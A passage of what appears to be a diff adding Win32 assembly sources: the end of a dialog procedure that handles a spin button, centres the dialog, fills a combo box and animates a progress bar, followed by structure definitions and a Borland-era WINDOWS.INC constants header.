SpinButtonClick + cmp initflag, 01h + je InitValues + xor eax, eax + ret + + CheckCommand: + cmp [wparam], 1009 + je Exit + cmp [wparam], 1014 + je SetOkFlag + xor eax, eax + ret + + SpinButtonClick: + xor eax, eax + mov ecx, [wparam] + rol ecx, 16 + mov ax, cx + + mov ecx, pastvalue + cmp ecx, eax + jge PressedUp + + PressedDown: + mov pastvalue, eax + cmp doneflag, 00h + jne Reset + cmp currentvalue, '0' + je DontDecrease + dec byte ptr currentvalue + + DontDecrease: + push offset currentvalue + push 00h + push WM_SETTEXT + push 1003 + push handle + call SendDlgItemMessageA + mov doneflag, 01h + xor eax, eax + ret + + PressedUp: + mov pastvalue, eax + cmp currentvalue, '9' + je Reset + cmp doneflag, 00h + jne Reset + inc byte ptr currentvalue + push offset currentvalue + push 00h + push WM_SETTEXT + push 1003 + push handle + call SendDlgItemMessageA + mov doneflag, 01h + xor eax, eax + ret + + Reset: + mov doneflag, 00h + xor eax, eax + ret + + SetOkFlag: + mov okflag, 01h + jmp Exit + + CenterDlg1: + push offset dlgrect + push handle + call GetWindowRect + call GetDesktopWindow + push offset desktoprect + push eax + call GetWindowRect + + push 00h + mov eax, dlgrect.rcBottom + sub eax, dlgrect.rcTop + mov dlgheight, eax + push eax ; height + mov eax, dlgrect.rcRight + sub eax, dlgrect.rcLeft + mov dlgwidth, eax ; width + push eax + mov eax, desktoprect.rcBottom + sub eax, dlgheight + shr eax, 1 + push eax ; bottom + mov eax, desktoprect.rcRight + sub eax, dlgwidth + shr eax, 1 + push eax ; top + push handle ; handle + call MoveWindow ; move to center + mov initflag, 01h + xor eax, eax + ret + + InitValues: + mov initflag, 00h + call SendDlgItemMessageA, handle, 1004, CB_RESETCONTENT, 00h,00h + call SendDlgItemMessageA, handle, 1004, 143h, 00h, offset value11 + call SendDlgItemMessageA, handle, 1004, 143h, 00h, offset value12 + call SendDlgItemMessageA, handle, 1004, 143h, 00h, offset value13 + call SendDlgItemMessageA, handle, 1004, 143h, 00h, offset value14 + 
call SendDlgItemMessageA, handle, 1004, CB_SETCURSEL, 00h, 01h
+ call SendDlgItemMessageA, handle, 1003, WM_SETTEXT, 00h, offset currentvalue
+ call SendDlgItemMessageA, handle, 1005, WM_SETTEXT, 00h, offset value3
+ call SendDlgItemMessageA, handle, 1008, WM_SETTEXT, 00h, offset value4
+ call SendDlgItemMessageA, handle, 1000, 00F5h, 00h,00h
+ call SendDlgItemMessageA, handle, 1001, 00F5h, 00h,00h
+ call SendDlgItemMessageA, handle, 1006, 00F5h, 00h,00h
+ call SendDlgItemMessageA, handle, 1010, 00F5h, 00h,00h
+ call SendDlgItemMessageA, handle, 1013, 00F5h, 00h,00h
+ xor eax, eax
+ ret
+
+ Exit1:
+ push wparam
+ push handle
+ call EndDialog
+ mov eax, 01h
+ ret
+
+MYDIALOG_1 endp
+
+PROGRESS proc handle: dword
+
+ ClearProgressBar:
+ push 00h
+ push 00h
+ push PBM_SETPOS
+ push 105
+ push handle
+ call SendDlgItemMessageA
+ xor eax, eax
+ xor ecx, ecx
+
+ LittleLoop:
+ inc ecx
+ cmp ecx, 100000h
+ jne LittleLoop
+
+ ProgressLoop:
+ inc eax
+ push 00h
+ push eax
+ push PBM_SETPOS
+ push 105
+ push handle
+ call SendDlgItemMessageA
+ xor ecx, ecx
+ cmp eax, 99d
+ jne LittleLoop
+
+ ProgressDone:
+ mov flag, 02h
+ push threadid
+ call CloseHandle
+ ret
+
+PROGRESS endp
+
+;============================================================================;
+
+end Start
+end
+[ICECUBES.ASM]
+[MYINC.INC]
+LPVOID typedef DWORD ;long ptr to buffer
+BOOL typedef DWORD ;boolean variable
+HANDLE typedef DWORD ;unspecified handle
+LPSTR typedef DWORD ;long ptr to string
+LPBYTE typedef DWORD ;long ptr to byte
+ACHAR typedef BYTE ;ansi character
+CHAR textequ ;ansi char type
+CHAR_ equ 1 ;ansi char size
+
+CREATE_DEFAULT_ERROR_MODE equ 04000000h
+
+SECURITY_ATTRIBUTES_ equ 4+4+4
+SECURITY_ATTRIBUTES struct
+sa_nLength DWORD SECURITY_ATTRIBUTES_ ;structure size
+sa_lpSecurityDescriptor LPVOID 0 ;security descriptor
+sa_bInheritHandle BOOL 0 ;handle inheritance flag
+SECURITY_ATTRIBUTES ends
+
+PROCESS_INFORMATION struct
+pi_hProcess HANDLE 0 ;process handle
+pi_hThread HANDLE 0 
;thread handle
+pi_dwProcessId DWORD 0 ;process id
+pi_dwThreadId DWORD 0 ;thread id
+PROCESS_INFORMATION ends
+PROCESS_INFORMATION_ equ 4+4+4+4
+
+STARTUPINFO struct
+si_cb DWORD 0 ;structure size
+si_lpReserved LPSTR 0 ;(reserved)
+si_lpDesktop LPSTR 0 ;desktop name
+sl_lpTitle LPSTR 0 ;console window title
+si_dwX DWORD 0 ;window origin (column)
+si_dwY DWORD 0 ;window origin (row)
+si_dwXSize DWORD 0 ;window width
+si_dwYSize DWORD 0 ;window height
+si_dwXCountChars DWORD 0 ;screen buffer width
+si_dwYCountChars DWORD 0 ;screen buffer height
+si_dwFillAttribute DWORD 0 ;console window initialization
+si_dwFlags DWORD 0 ;structure member flags
+si_wShowWindow WORD 0 ;ShowWindow() parameter
+si_cbReserved2 WORD 0 ;(reserved)
+si_lpReserved2 LPBYTE 0 ;(reserved)
+si_hStdInput HANDLE 0 ;standard input handle
+si_hStdOutput HANDLE 0 ;standard output handle
+si_hStdError HANDLE 0 ;standard error handle
+STARTUPINFO ends
+STARTUPINFO_ equ 4+4+4+4+4+4+4+4+4+4+4+4+2+2+4+4+4+4
+
+SYSTEMTIME struct
+wYear WORD 0 ;current year
+wMonth WORD 0 ;current month (1..12)
+wDayOfWeek WORD 0 ;day of week (0 = sunday)
+wDay WORD 0 ;current day of the month
+wHour WORD 0 ;current hour
+wMinute WORD 0 ;current minute
+wSecond WORD 0 ;current second
+wMilliseconds WORD 0 ;current millisecond
+SYSTEMTIME ends
+SYSTEMTIME_ equ 2+2+2+2+2+2+2+2
+;
+
+WIN32_FIND_DATA_ equ 4+8+8+8+4+4+4+4+(260*CHAR_)+(14*CHAR_)
+WIN32_FIND_DATA struct
+fd_dwFileAttributes DWORD 0 ;file attributes
+fd_ftCreationTime DWORD 0, 0 ;time of file creation
+fd_ftLastAccessTime DWORD 0, 0 ;time of last file access
+fd_ftLastWriteTime DWORD 0, 0 ;time of last write access
+fd_nFileSizeHigh DWORD 0 ;high-order word of file size
+fd_nFileSizeLow DWORD 0 ;low-order word of file size
+fd_dwReserved0 DWORD 0 ;(reserved)
+fd_dwReserved1 DWORD 0 ;(reserved)
+fd_cFileName CHAR 260 dup(0) ;matching file name
+fd_cAlternateFileName CHAR 14 dup(0) ;8.3 alias name
+WIN32_FIND_DATA ends
+;
+[MYINC.INC]
+[WINDOWS.INC]
+;*************************************************************************
+;
+; WINDOWS.INC - Windows assembly language structures & constants
+;
+;*************************************************************************
+;
+;
+; C/C++ Run Time Library - Version 7.0
+;
+; Copyright (c) 1985, 1996 by Borland International
+; All Rights Reserved.
+;
+;
+; Conditional Block includes: (True states)
+; NOTEXT - don't include TextMetric struc & text drawing modes & stock objs.
+; NORASTOPS - don't include binary and ternary raster ops.
+; NOVK - don't include virtual key definitions
+; NOMB - don't include message box definitions
+; NOWM - don't include window messages
+;
+;
+FALSE = 0
+TRUE = 1
+NULL = 0
+
+
+;*******************************************************************
+;
+; Misc EQU's
+;
+;*******************************************************************
+
+SB_SETTEXTA equ WM_USER+01
+SB_GETTEXTA equ WM_USER+02
+SB_GETTEXTLENGTHA equ WM_USER+03
+SB_SETPARTS equ WM_USER+04
+SB_GETPARTS equ WM_USER+06
+SB_GETBORDERS equ WM_USER+07
+SB_SETMINHEIGHT equ WM_USER+08
+SB_SIMPLE equ WM_USER+09
+SB_GETRECT equ WM_USER+10
+SB_SETTEXTW equ WM_USER+11
+SB_GETTEXTLENGTHW equ WM_USER+12
+SB_GETTEXTW equ WM_USER+13
+
+GCL_MENUNAME equ -8
+GCL_HBRBACKGROUND equ -10
+GCL_HCURSOR equ -12
+GCL_HICON equ -14
+GCL_HMODULE equ -16
+GCL_CBWNDEXTRA equ -18
+GCL_CBCLSEXTRA equ -20
+GCL_WNDPROC equ -24
+GCL_STYLE equ -26
+
+PBM_SETRANGE equ WM_USER+1
+PBM_SETPOS equ WM_USER+2
+PBM_DELTAPOS equ WM_USER+3
+PBM_SETSTEP equ WM_USER+4
+PBM_STEPIT equ WM_USER+5
+
+ICON_SMALL equ 0
+DEFAULT_PITCH equ 0
+DEFAULT_QUALITY equ 0
+OEM_CHARSET equ 255
+CLIP_CHARACTER_PRECIS equ 1
+CLIP_DEFAULT_PRECIS equ 0
+OUT_DEFAULT_PRECIS equ 0
+
+;*******************************************************************
+;
+; Window Class
+;
+;*******************************************************************
+
+DLGWINDOWEXTRA equ 30
+
+WNDCLASSEX STRUCT
+ wc_cbSize DWORD ?
+ wc_style DWORD ? 
+ wc_lpfnWndProc DWORD ?
+ wc_cbClsExtra DWORD ?
+ wc_cbWndExtra DWORD ?
+ wc_hInstance DWORD ?
+ wc_hIcon DWORD ?
+ wc_hCursor DWORD ?
+ wc_hbrBackground DWORD ?
+ wc_lpszMenuName DWORD ?
+ wc_lpszClassName DWORD ?
+ wc_hIconSm DWORD ?
+WNDCLASSEX ENDS
+
+;*******************************************************************
+;
+; Message Structure
+;
+;*******************************************************************
+
+MSG STRUCT
+ msg_hwnd DWORD ?
+ msg_message DWORD ?
+ msg_wParam DWORD ?
+ msg_lParam DWORD ?
+ msg_time DWORD ?
+ msg_pt QWORD ?
+MSG ENDS
+
+;*******************************************************************
+;
+; Open Filename Dialog
+;
+;*******************************************************************
+
+OPENFILENAME STRUCT
+ of_lStructSize DWORD ?
+ of_hWndOwner DWORD ?
+ of_hInstance DWORD ?
+ of_lpstrFilter DWORD ?
+ of_lpstrCustomFilter DWORD ?
+ of_nMaxCustFilter DWORD ?
+ of_nFilterIndex DWORD ?
+ of_lpstrFile DWORD ?
+ of_nMaxFile DWORD ?
+ of_lpstrFileTitle DWORD ?
+ of_nMaxFileTitle DWORD ?
+ of_lpstrInitialDir DWORD ?
+ of_lpstrTitle DWORD ?
+ of_Flags DWORD ?
+ of_nFileOffset WORD ?
+ of_nFileExtension WORD ?
+ of_lpstrDefExt DWORD ?
+ of_lCustData DWORD ?
+ of_lpfnHook DWORD ?
+ of_lpTemplateName DWORD ? 
+OPENFILENAME ENDS + +OFN_ALLOWMULTISELECT equ 00000200h +OFN_CREATEPROMPT equ 00002000h +OFN_ENABLEHOOK equ 00000020h +OFN_ENABLETEMPLATE equ 00000040h +OFN_ENABLETEMPLATEHANDLE equ 00000080h +OFN_EXPLORER equ 00080000h +OFN_EXTENSIONDIFFERENT equ 00000400h +OFN_FILEMUSTEXIST equ 00001000h +OFN_HIDEREADONLY equ 00000004h +OFN_LONGNAMES equ 00200000h +OFN_NOCHANGEDIR equ 00000008h +OFN_NODEREFERENCELINKS equ 00100000h +OFN_NOLONGNAMES equ 00040000h +OFN_NONETWORKBUTTON equ 00020000h +OFN_NOREADONLYRETURN equ 00008000h +OFN_NOTESTFILECREATE equ 00010000h +OFN_NOVALIDATE equ 00000100h +OFN_OVERWRITEPROMPT equ 00000002h +OFN_PATHMUSTEXIST equ 00000800h +OFN_READONLY equ 00000001h +OFN_SHAREAWARE equ 00004000h +OFN_SHOWHELP equ 00000010h +OFN_SHAREFALLTHROUGH equ 2 +OFN_SHARENOWARN equ 1 +OFN_SHAREWARN equ 0 + + +;******************************************************************* +; +; List View Control +; +;******************************************************************* + +LVM_GETITEM equ LVM_FIRST + 5 +LVM_GETITEMW equ LVM_FIRST + 75 +LVM_SETITEM equ LVM_FIRST + 6 +LVM_SETITEMW equ LVM_FIRST + 76 +LVM_INSERTITEM equ LVM_FIRST + 7 +LVM_INSERTITEMW equ LVM_FIRST + 77 +LVM_DELETEITEM equ LVM_FIRST + 8 +LVM_DELETEALLITEMS equ LVM_FIRST + 9 +LVM_GETCALLBACKMASK equ LVM_FIRST + 10 +LVM_FIRST equ 1000h +LVM_SETCALLBACKMASK equ LVM_FIRST + 11 +LVM_GETITEMRECT equ LVM_FIRST + 14 +LVM_SETITEMPOSITION equ LVM_FIRST + 15 +LVM_GETITEMPOSITION equ LVM_FIRST + 16 +LVM_GETSTRINGWIDTH equ LVM_FIRST + 17 +LVM_GETSTRINGWIDTHW equ LVM_FIRST + 87 +LVCF_FMT equ 0001h +LVCF_WIDTH equ 0002h +LVCF_TEXT equ 0004h +LVCF_SUBITEM equ 0008h +LVCFMT_LEFT equ 0000h +LVCFMT_RIGHT equ 0001h +LVCFMT_CENTER equ 0002h +LVCFMT_JUSTIFYMASK equ 0003h +LVM_GETCOLUMN equ LVM_FIRST + 25 +LVM_GETCOLUMNW equ LVM_FIRST + 95 +LVM_SETCOLUMN equ LVM_FIRST + 26 +LVM_SETCOLUMNW equ LVM_FIRST + 96 +LVM_INSERTCOLUMN equ LVM_FIRST + 27 +LVM_INSERTCOLUMNW equ LVM_FIRST + 97 +LVM_DELETECOLUMN equ LVM_FIRST + 28 
+LVM_GETCOLUMNWIDTH equ LVM_FIRST + 29 +LVIF_TEXT equ 0001h +LVIF_IMAGE equ 0002h +LVIF_PARAM equ 0004h +LVIF_STATE equ 0008h + + + +LV_ITEM STRUC + lvi_imask DWORD ? + lvi_iItem DWORD ? + lvi_iSubItem DWORD ? + lvi_state DWORD ? + lvi_stateMask DWORD ? + lvi_pszText DWORD ? + lvi_cchTextMax DWORD ? + lvi_iImage DWORD ? + lvi_lParam DWORD ? + lvi_iIndent DWORD ? +LV_ITEM ENDS + +LV_FINDINFO STRUC + lvfi_flags DWORD ? + lvfi_psz DWORD ? + lvfi_lParam DWORD ? + lvfi_pt QWORD ? + lvfi_vkDirection DWORD ? +LV_FINDINFO ENDS + +LV_HITTESTINFO STRUC + lvht_pt QWORD ? + lvht_flags DWORD ? + lvht_iItem DWORD ? +LV_HITTESTINFO ENDS + +LV_COLUMN STRUC + lvc_imask DWORD ? + lvc_fmt DWORD ? + lvc_lx DWORD ? + lvc_pszText DWORD ? + lvc_cchTextMax DWORD ? + lvc_iSubItem DWORD ? +LV_COLUMN ENDS + +;******************************************************************* +; +; Rectangle +; +;******************************************************************* + +RECT struc + rcLeft dd ? + rcTop dd ? + rcRight dd ? + rcBottom dd ? +RECT ends + +;******************************************************************* +; +; Window Class structure +; +;******************************************************************* + +WNDCLASS struc + clsStyle dw ? ; class style + clsLpfnWndProc dd ? + clsCbClsExtra dw ? + clsCbWndExtra dw ? + clsHInstance dw ? ; instance handle + clsHIcon dw ? ; class icon handle + clsHCursor dw ? ; class cursor handle + clsHbrBackground dw ? ; class background brush + clsLpszMenuName dd ? ; menu name + clsLpszClassName dd ? ; far ptr to class name +WNDCLASS ends + +IFNDEF NOTEXT +TEXTMETRIC struc + tmHeight dw ? + tmAscent dw ? + tmDescent dw ? + tmIntLeading dw ? + tmExtLeading dw ? + tmAveCharWidth dw ? + tmMaxCharWidth dw ? + tmWeight dw ? + tmItalic db ? + tmUnderlined db ? + tmStruckOut db ? + tmFirstChar db ? + tmLastChar db ? + tmDefaultChar db ? + tmBreakChar db ? + tmPitch db ? + tmCharSet db ? + tmOverhang dw ? + tmAspectX dw ? + tmAspectY dw ? 
+TEXTMETRIC ends + +LF_FACESIZE EQU 32 + +LOGFONT struc + lfHeight dw ? + lfWidth dw ? + lfEscapement dw ? + lfOrientation dw ? + lfWeight dw ? + lfItalic db ? + lfUnderline db ? + lfStrikeOut db ? + lfCharSet db ? + lfOutPrecision db ? + lfClipPrecision db ? + lfQuality db ? + lfPitchAndFamily db ? + lfFaceName db LF_FACESIZE dup(?) +LOGFONT ends + +LOGBRUSH struc + lbStyle dw ? + lbColor dd ? + lbHatch dw ? +LOGBRUSH ends + +; +; Text Drawing modes +; +TRANSPARENT = 1 +OPAQUE = 2 +; +; Mapping Modes +; +MM_TEXT = 1 +MM_LOMETRIC = 2 +MM_HIMETRIC = 3 +MM_LOENGLISH = 4 +MM_HIENGLISH = 5 +MM_TWIPS = 6 +MM_ISOTROPIC = 7 +MM_ANISOTROPIC = 8 +; +; Coordinate Modes +; +ABSOLUTE = 1 +RELATIVE = 2 +; +; Stock Logical Objects +; +WHITE_BRUSH = 0 +LTGRAY_BRUSH = 1 +GRAY_BRUSH = 2 +DKGRAY_BRUSH = 3 +BLACK_BRUSH = 4 +NULL_BRUSH = 5 +HOLLOW_BRUSH = 5 +WHITE_PEN = 6 +BLACK_PEN = 7 +NULL_PEN = 8 +DOT_MARKER = 9 +OEM_FIXED_FONT = 10 +ANSI_FIXED_FONT = 11 +ANSI_VAR_FONT = 12 +SYSTEM_FONT = 13 +DEVICE_DEFAULT_FONT = 14 +DEFAULT_PALETTE = 15 +SYSTEM_FIXED_FONT = 16 +ENDIF +; +; Brush Styles +; +BS_SOLID = 0 +BS_NULL = 1 +BS_HOLLOW = BS_NULL +BS_HATCHED = 2 +BS_PATTERN = 3 +BS_INDEXED = 4 +BS_DIBPATTERN = 5 +; +; Hatch Styles +; +HS_HORIZONTAL = 0 ; ----- +HS_VERTICAL = 1 ; ||||| +HS_FDIAGONAL = 2 ; \\\\\ +HS_BDIAGONAL = 3 ; ///// +HS_CROSS = 4 ; +++++ +HS_DIAGCROSS = 5 ; xxxxx +; +; Pen Styles +; +PS_SOLID = 0 +PS_DASH = 1 ; ------- +PS_DOT = 2 ; ....... 
+PS_DASHDOT = 3 ; _._._._
+PS_DASHDOTDOT = 4 ; _.._.._
+PS_NULL = 5
+PS_INSIDEFRAME = 6
+;
+; Device Parameters for GetDeviceCaps()
+;
+DRIVERVERSION =0 ; Device driver version
+TECHNOLOGY =2 ; Device classification
+HORZSIZE =4 ; Horizontal size in millimeters
+VERTSIZE =6 ; Vertical size in millimeters
+HORZRES =8 ; Horizontal width in pixels
+VERTRES =10 ; Vertical width in pixels
+BITSPIXEL =12 ; Number of bits per pixel
+PLANES =14 ; Number of planes
+NUMBRUSHES =16 ; Number of brushes the device has
+NUMPENS =18 ; Number of pens the device has
+NUMMARKERS =20 ; Number of markers the device has
+NUMFONTS =22 ; Number of fonts the device has
+NUMCOLORS =24 ; Number of colors the device supports
+PDEVICESIZE =26 ; Size required for device descriptor
+CURVECAPS =28 ; Curve capabilities
+LINECAPS =30 ; Line capabilities
+POLYGONALCAPS =32 ; Polygonal capabilities
+TEXTCAPS =34 ; Text capabilities
+CLIPCAPS =36 ; Clipping capabilities
+RASTERCAPS =38 ; Bitblt capabilities
+ASPECTX =40 ; Length of the X leg
+ASPECTY =42 ; Length of the Y leg
+ASPECTXY =44 ; Length of the hypotenuse
+
+LOGPIXELSX =88 ; Logical pixels/inch in X
+LOGPIXELSY =90 ; Logical pixels/inch in Y
+
+SIZEPALETTE =104 ; Number of entries in physical palette
+NUMRESERVED =106 ; Number of reserved entries in palette
+COLORRES =108 ; Actual color resolution
+;
+ifndef NOGDICAPMASKS
+;
+; Device Capability Masks:
+;
+; Device Technologies
+DT_PLOTTER = 0 ; /* Vector plotter */
+DT_RASDISPLAY = 1 ; /* Raster display */
+DT_RASPRINTER = 2 ; /* Raster printer */
+DT_RASCAMERA = 3 ; /* Raster camera */
+DT_CHARSTREAM = 4 ; /* Character-stream, PLP */
+DT_METAFILE = 5 ; /* Metafile, VDM */
+DT_DISPFILE = 6 ; /* Display-file */
+;
+; Curve Capabilities
+CC_NONE = 0 ; /* Curves not supported */
+CC_CIRCLES = 1 ; /* Can do circles */
+CC_PIE = 2 ; /* Can do pie wedges */
+CC_CHORD = 4 ; /* Can do chord arcs */
+CC_ELLIPSES = 8 ; /* Can do ellipese */
+CC_WIDE = 16 ; /* Can do wide lines */
+CC_STYLED = 32 ; 
/* Can do styled lines */
+CC_WIDESTYLED = 64 ; /* Can do wide styled lines */
+CC_INTERIORS = 128; /* Can do interiors */
+;
+; Line Capabilities
+LC_NONE = 0 ; /* Lines not supported */
+LC_POLYLINE = 2 ; /* Can do polylines */
+LC_MARKER = 4 ; /* Can do markers */
+LC_POLYMARKER = 8 ; /* Can do polymarkers */
+LC_WIDE = 16 ; /* Can do wide lines */
+LC_STYLED = 32 ; /* Can do styled lines */
+LC_WIDESTYLED = 64 ; /* Can do wide styled lines */
+LC_INTERIORS = 128; /* Can do interiors */
+;
+; Polygonal Capabilities
+PC_NONE = 0 ; /* Polygonals not supported */
+PC_POLYGON = 1 ; /* Can do polygons */
+PC_RECTANGLE = 2 ; /* Can do rectangles */
+PC_WINDPOLYGON = 4 ; /* Can do winding polygons */
+PC_TRAPEZOID = 4 ; /* Can do trapezoids */
+PC_SCANLINE = 8 ; /* Can do scanlines */
+PC_WIDE = 16 ; /* Can do wide borders */
+PC_STYLED = 32 ; /* Can do styled borders */
+PC_WIDESTYLED = 64 ; /* Can do wide styled borders */
+PC_INTERIORS = 128; /* Can do interiors */
+;
+; Polygonal Capabilities */
+CP_NONE = 0 ; /* No clipping of output */
+CP_RECTANGLE = 1 ; /* Output clipped to rects */
+;
+; Text Capabilities
+TC_OP_CHARACTER = 0001h ; /* Can do OutputPrecision CHARACTER */
+TC_OP_STROKE = 0002h ; /* Can do OutputPrecision STROKE */
+TC_CP_STROKE = 0004h ; /* Can do ClipPrecision STROKE */
+TC_CR_90 = 0008h ; /* Can do CharRotAbility 90 */
+TC_CR_ANY = 0010h ; /* Can do CharRotAbility ANY */
+TC_SF_X_YINDEP = 0020h ; /* Can do ScaleFreedom X_YINDEPENDENT */
+TC_SA_DOUBLE = 0040h ; /* Can do ScaleAbility DOUBLE */
+TC_SA_INTEGER = 0080h ; /* Can do ScaleAbility INTEGER */
+TC_SA_CONTIN = 0100h ; /* Can do ScaleAbility CONTINUOUS */
+TC_EA_DOUBLE = 0200h ; /* Can do EmboldenAbility DOUBLE */
+TC_IA_ABLE = 0400h ; /* Can do ItalisizeAbility ABLE */
+TC_UA_ABLE = 0800h ; /* Can do UnderlineAbility ABLE */
+TC_SO_ABLE = 1000h ; /* Can do StrikeOutAbility ABLE */
+TC_RA_ABLE = 2000h ; /* Can do RasterFontAble ABLE */
+TC_VA_ABLE = 4000h ; /* Can do VectorFontAble ABLE 
*/
+TC_RESERVED = 8000h
+;
+; Raster Capabilities
+RC_BITBLT = 1 ; /* Can do standard BLT. */
+RC_BANDING = 2 ; /* Device requires banding support */
+RC_SCALING = 4 ; /* Device requires scaling support */
+RC_BITMAP64 = 8 ; /* Device can support >64K bitmap */
+RC_GDI20_OUTPUT = 0010h ; /* has 2.0 output calls */
+RC_DI_BITMAP = 0080h ; /* supports DIB to memory */
+RC_PALETTE = 0100h ; /* supports a palette */
+RC_DIBTODEV = 0200h ; /* supports DIBitsToDevice */
+RC_BIGFONT = 0400h ; /* supports >64K fonts */
+RC_STRETCHBLT = 0800h ; /* supports StretchBlt */
+RC_FLOODFILL = 1000h ; /* supports FloodFill */
+RC_STRETCHDIB = 2000h ; /* supports StretchDIBits */
+
+endif ;NOGDICAPMASKS
+
+; palette entry flags
+;
+PC_RESERVED = 1 ;/* palette index used for animation */
+PC_EXPLICIT = 2 ;/* palette index is explicit to device */
+PC_NOCOLLAPSE = 4 ;/* do not match color to system palette */
+
+; DIB color table identifiers
+;
+DIB_RGB_COLORS = 0 ;/* color table in RGBTriples */
+DIB_PAL_COLORS = 1 ;/* color table in palette indices */
+;
+
+;constants for Get/SetSystemPaletteUse()
+;
+SYSPAL_STATIC = 1
+SYSPAL_NOSTATIC = 2
+
+; constants for CreateDIBitmap
+CBM_INIT = 4 ;/* initialize bitmap */
+;
+; Bitmap format constants
+BI_RGB = 0
+BI_RLE8 = 1
+BI_RLE4 = 2
+;
+;
+ANSI_CHARSET = 0
+SYMBOL_CHARSET = 2
+OEM_CHARSET = 255
+;
+; styles for CombineRgn
+;
+RGN_AND = 1
+RGN_OR = 2
+RGN_XOR = 3
+RGN_DIFF = 4
+RGN_COPY = 5
+;
+; Predefined cursor & icon IDs
+;
+IDC_ARROW = 32512
+IDC_IBEAM = 32513
+IDC_WAIT = 32514
+IDC_CROSS = 32515
+IDC_UPARROW = 32516
+IDC_SIZE = 32640
+IDC_ICON = 32641
+IDC_SIZENWSE = 32642
+IDC_SIZENESW = 32643
+IDC_SIZEWE = 32644
+IDC_SIZENS = 32645
+
+IDI_APPLICATION = 32512
+IDI_HAND = 32513
+IDI_QUESTION = 32514
+IDI_EXCLAMATION = 32515
+IDI_ASTERISK = 32516
+
+;
+; OEM Resource Ordinal Numbers */
+;
+OBM_CLOSE = 32754
+OBM_UPARROW = 32753
+OBM_DNARROW = 32752
+OBM_RGARROW = 32751
+OBM_LFARROW = 32750
+OBM_REDUCE = 32749
+OBM_ZOOM = 32748 
+OBM_RESTORE = 32747
+OBM_REDUCED = 32746
+OBM_ZOOMD = 32745
+OBM_RESTORED = 32744
+OBM_UPARROWD = 32743
+OBM_DNARROWD = 32742
+OBM_RGARROWD = 32741
+OBM_LFARROWD = 32740
+OBM_MNARROW = 32739
+OBM_COMBO = 32738
+OBM_UPARROWI = 32737
+OBM_DNARROWI = 32736
+OBM_RGARROWI = 32735
+OBM_LFARROWI = 32734
+
+OBM_OLD_CLOSE = 32767
+OBM_SIZE = 32766
+OBM_OLD_UPARROW = 32765
+OBM_OLD_DNARROW = 32764
+OBM_OLD_RGARROW = 32763
+OBM_OLD_LFARROW = 32762
+OBM_BTSIZE = 32761
+OBM_CHECK = 32760
+OBM_CHECKBOXES = 32759
+OBM_BTNCORNERS = 32758
+OBM_OLD_REDUCE = 32757
+OBM_OLD_ZOOM = 32756
+OBM_OLD_RESTORE = 32755
+
+OCR_NORMAL = 32512
+OCR_IBEAM = 32513
+OCR_WAIT = 32514
+OCR_CROSS = 32515
+OCR_UP = 32516
+OCR_SIZE = 32640
+OCR_ICON = 32641
+OCR_SIZENWSE = 32642
+OCR_SIZENESW = 32643
+OCR_SIZEWE = 32644
+OCR_SIZENS = 32645
+OCR_SIZEALL = 32646
+OCR_ICOCUR = 32647
+
+OIC_SAMPLE = 32512
+OIC_HAND = 32513
+OIC_QUES = 32514
+OIC_BANG = 32515
+OIC_NOTE = 32516
+
+;
+; Scroll bar constants
+;
+SB_HORZ = 0
+SB_VERT = 1
+SB_CTL = 2
+SB_BOTH = 3
+;
+; Scroll Commands
+;
+SB_LINEUP = 0
+SB_LINEDOWN = 1
+SB_PAGEUP = 2
+SB_PAGEDOWN = 3
+SB_THUMBPOSITION = 4
+SB_THUMBTRACK = 5
+SB_TOP = 6
+SB_BOTTOM = 7
+SB_ENDSCROLL = 8
+;
+; MessageBox type flags
+;
+IFNDEF NOMB
+MB_OK = 0000H
+MB_OKCANCEL = 0001H
+MB_ABORTRETRYIGNORE = 0002H
+MB_YESNOCANCEL = 0003H
+MB_YESNO = 0004H
+MB_RETRYCANCEL = 0005H
+
+MB_ICONHAND = 0010H
+MB_ICONQUESTION = 0020H
+MB_ICONEXCLAMATION = 0030H
+MB_ICONASTERISK = 0040H
+
+MB_DEFBUTTON1 = 0000H
+MB_DEFBUTTON2 = 0100H
+MB_DEFBUTTON3 = 0200H
+
+MB_APPLMODAL = 0000H
+MB_SYSTEMMODAL = 1000H
+MB_TASKMODAL = 2000H
+
+MB_NOFOCUS = 8000H
+
+;
+; Conventional dialog box and message box command IDs
+;
+IDOK = 1
+IDCANCEL = 2
+IDABORT = 3
+IDRETRY = 4
+IDIGNORE = 5
+IDYES = 6
+IDNO = 7
+;
+; Flags for OpenFile
+;
+OF_READ = 0000H
+OF_WRITE = 0001H
+OF_READWRITE = 0002H
+OF_SHARE_COMPAT = 0000H
+OF_SHARE_EXCLUSIVE = 0010H
+OF_SHARE_DENY_WRITE = 0020H
+OF_SHARE_DENY_READ = 0030H 
+OF_SHARE_DENY_NONE = 0040H
+OF_PARSE = 0100H
+OF_DELETE = 0200H
+OF_VERIFY = 0400H ; Used with OF_REOPEN
+OF_SEARCH = 0400H ; Used without OF_REOPEN
+OF_CANCEL = 0800H
+OF_CREATE = 1000H
+OF_PROMPT = 2000H
+OF_EXIST = 4000H
+OF_REOPEN = 8000H
+
+TF_FORCEDRIVE = 80H
+
+OPENSTRUC STRUC
+opLen db ?
+opDisk db ?
+opXtra dw ?
+opDate dw ?
+opTime dw ?
+opFile db 120 dup (?)
+OPENSTRUC ENDS
+;
+; DrawText format flags
+;
+DT_LEFT = 00H
+DT_CENTER = 01H
+DT_RIGHT = 02H
+DT_TOP = 00H
+DT_VCENTER = 04H
+DT_BOTTOM = 08H
+DT_WORDBREAK = 10H
+DT_SINGLELINE = 20H
+DT_EXPANDTABS = 40H
+DT_TABSTOP = 80H
+DT_NOCLIP = 0100H
+DT_EXTERNALLEADING = 0200H
+DT_CALCRECT = 0400H
+DT_NOPREFIX = 0800H
+DT_INTERNAL = 1000H
+ENDIF
+
+;
+; ExtFloodFill style flags
+;
+FLOODFILLBORDER = 0
+FLOODFILLSURFACE = 1
+
+;
+; Memory manager flags
+;
+LMEM_FIXED = 0000h
+LMEM_MOVEABLE = 0002h
+LMEM_NOCOMPACT = 0010H
+LMEM_NODISCARD = 0020H
+LMEM_ZEROINIT = 0040h
+LMEM_MODIFY = 0080H
+LMEM_DISCARDABLE= 0F00h
+LHND = LMEM_MOVEABLE+LMEM_ZEROINIT
+LPTR = LMEM_FIXED+LMEM_ZEROINIT
+; Flags returned by LocalFlags (in addition to LMEM_DISCARDABLE)
+LMEM_DISCARDED = 4000H
+LMEM_LOCKCOUNT = 00FFH
+
+NONZEROLHND = LMEM_MOVEABLE
+NONZEROLPTR = LMEM_FIXED
+
+
+
+GMEM_FIXED = 0000h
+GMEM_MOVEABLE = 0002h
+GMEM_NOCOMPACT = 0010h
+GMEM_NODISCARD = 0020h
+GMEM_ZEROINIT = 0040h
